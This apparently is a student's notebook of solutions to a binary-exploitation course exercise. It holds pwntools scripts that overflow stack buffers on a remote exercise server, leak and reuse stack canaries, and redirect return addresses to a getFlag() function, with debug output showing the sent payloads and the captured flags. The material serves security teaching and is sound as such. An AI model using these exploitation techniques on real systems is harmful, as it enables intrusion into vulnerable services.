In [4]:
#EXERCISE 0
import pwn as pwn
r = pwn.remote("158.39.77.181", 7000)
payload = pwn.cyclic(length=16)
payload += pwn.p32(0x79beef8b)
print(r.readline().decode("ascii"))
print(payload)
r.sendline(payload)
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
r.close()

[x] Opening connection to 158.39.77.181 on port 7000
[x] Opening connection to 158.39.77.181 on port 7000: Trying 158.39.77.181
[+] Opening connection to 158.39.77.181 on port 7000: Done
[DEBUG] Received 0x1a bytes:
    b'Input an argument to pass\n'
Input an argument to pass

b'aaaabaaacaaadaaa\x8b\xef\xbey'
[DEBUG] Sent 0x15 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  8b ef be 79  0a                                     │···y│·│
    00000015
[DEBUG] Received 0x41 bytes:
    b'Well done, you can get the flag\n'
    b'dyfaculybumatupolokewijupucugejo\n'
Well done, you can get the flag

dyfaculybumatupolokewijupucugejo

[*] Closed connection to 158.39.77.181 port 7000


In [5]:
#EXERCISE 1
import pwn as pwn
pwn.context.log_level = 'debug'
r = pwn.remote("158.39.77.181", 7001)

payload = pwn.cyclic(length=16)
#append the address of the getFlag() function
payload += pwn.p64(0x00000000004011f6)
print(r.readline().decode("ascii"))
r.sendline(payload)
print(payload)
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
r.close()

[x] Opening connection to 158.39.77.181 on port 7001
[x] Opening connection to 158.39.77.181 on port 7001: Trying 158.39.77.181
[+] Opening connection to 158.39.77.181 on port 7001: Done
[DEBUG] Received 0x25 bytes:
    b'Try to get flag by inputing argument\n'
Try to get flag by inputing argument

[DEBUG] Sent 0x19 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  f6 11 40 00  00 00 00 00  0a                        │··@·│····│·│
    00000019
b'aaaabaaacaaadaaa\xf6\x11@\x00\x00\x00\x00\x00'
[DEBUG] Received 0x1e bytes:
    b'Function is goint to 0x4011f6\n'
Function is goint to 0x4011f6

[DEBUG] Received 0x78 bytes:
    b'Congrats! you can get the flag\n'
    b'pogixihikonobasufehemigurevihamu\n'
    b'*** stack smashing detected ***: ./assignB01 terminated\n'
Congrats! you can get the flag

pogixihikonobasufehemigurevihamu

[*] Closed connection to 158.39.77.181 port 7001


In [6]:
#EXERCISE 2
import pwn as pwn
r = pwn.remote("158.39.77.181", 7002)

payload = b"A"*24
print(r.readline().decode("ascii"))
r.sendline(b"16")
print(16)

#receive the read canary - canary has 8 bytes
received = str(hex(int(r.readline().decode("ascii"))))
print(received)
part1 = "0x" + received[10:18]
part2 = received[0:10]
print(part1 +" " + part2)
print(r.readline().decode("ascii"))
#append the read canary
payload += pwn.p32(int(part1, 16))
payload += pwn.p32(int(part2, 16))
#8 Byte bis zum return pointer überbrücken
payload += b'A' * 8
#append the new return pointer - address of getFlag() 0x00000000_004007f7
payload += pwn.p64(0x00000000004007f7)

r.sendline(payload)
print(payload)
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
r.close()

[x] Opening connection to 158.39.77.181 on port 7002
[x] Opening connection to 158.39.77.181 on port 7002: Trying 158.39.77.181
[+] Opening connection to 158.39.77.181 on port 7002: Done
[DEBUG] Received 0x1a bytes:
    b'What does the canary say?\n'
What does the canary say?

[DEBUG] Sent 0x3 bytes:
    b'16\n'
16
[DEBUG] Received 0x14 bytes:
    b'1893942196073145344\n'
0x1a48a2648e102400
0x8e102400 0x1a48a264
[DEBUG] Received 0x22 bytes:
    b'Try to get flag by inputing value\n'
Try to get flag by inputing value

[DEBUG] Sent 0x31 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    00000010  41 41 41 41  41 41 41 41  00 24 10 8e  64 a2 48 1a  │AAAA│AAAA│·$··│d·H·│
    00000020  41 41 41 41  41 41 41 41  f7 07 40 00  00 00 00 00  │AAAA│AAAA│··@·│····│
    00000030  0a                                                  │·│
    00000031
b'AAAAAAAAAAAAAAAAAAAAAAAA\x00$\x10\x8ed\xa2H\x1aAAAAAAAA\xf7\x07@\x00\x00\x00\x00\x00'
[DEBUG] Received 

In [7]:
#EXERCISE 3 - getting the address of the canary
import pwn as pwn
pwn.context.log_level = 'error'
data = {}
value = int(0xffffe108) #the lowest address I got when testing on a local version

def get_key(val):
    for key, value in data.items():
         if val == value:
             return key
    return -1

while(value < int(0xffffffef)):
    r = pwn.remote("158.39.77.181", 7003)
    payload = b'A'* 32
    value += 16
    payload += pwn.p32(value)
    payload += pwn.p16(0x7fff)
    r.readline().decode("ascii")
    r.sendline(payload)

    try:
        canary = hex(int(r.recv(0x15).decode("ascii")))
    except EOFError:
        pass
    except ValueError:
        pass
    if abs(int(canary, 16)) > 0x0000010000000000: #arbitrarily chosen bound
        if get_key(canary) == -1:
            print(canary + " at " + hex(value))
            data.update({value : canary})
        
print(data)
r.close()

0xeb6981ec44afd at 0xffffeca8
{4294962344: '0xeb6981ec44afd'}


In [8]:
#EXERCISE 3 
import pwn as pwn
pwn.context.log_level = 'error'

r = pwn.remote("158.39.77.181", 7003)
print(r.readline().decode("ascii"))

#padding + address of canary
payload = b'A'* 32
payload += pwn.p64(0x7fffffffecc8)
r.sendline(payload)
print("sent: " + str(payload))

#canary value is the answer
readValue = r.readline().decode("ascii")[:-1]
print(readValue)

#padding + address of canary + canary + padding + new return pointer
payload2 = b'q'* 32 #fill the buffer
payload2 += pwn.p64(0x00007fffffffecc8) #the pt0 / canary address
payload2 += pwn.p64(int(readValue,16)) #the canary
payload2 += b'A'*8 #padding 
payload2 += pwn.p64(0x00000000004011d6) #new return address
r.sendline(payload2)
print("sent: " + str(payload2))

print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))
print(r.readline().decode("ascii"))

Do not, for one repulse, forego the purpose that you resolved to effect -William Shakespeare, The Tempest

sent: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc8\xec\xff\xff\xff\x7f\x00\x00'
3da7799e47f66800
sent: b'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\xc8\xec\xff\xff\xff\x7f\x00\x00\x00h\xf6G\x9ey\xa7=AAAAAAAA\xd6\x11@\x00\x00\x00\x00\x00'
Do not, for one repulse, forego the purpose that you resolved to effect -William Shakespeare, The Tempest

3da7799e47f66800

Well done, you can get the flag

meximafinetogyjuwohipyzobywosobu

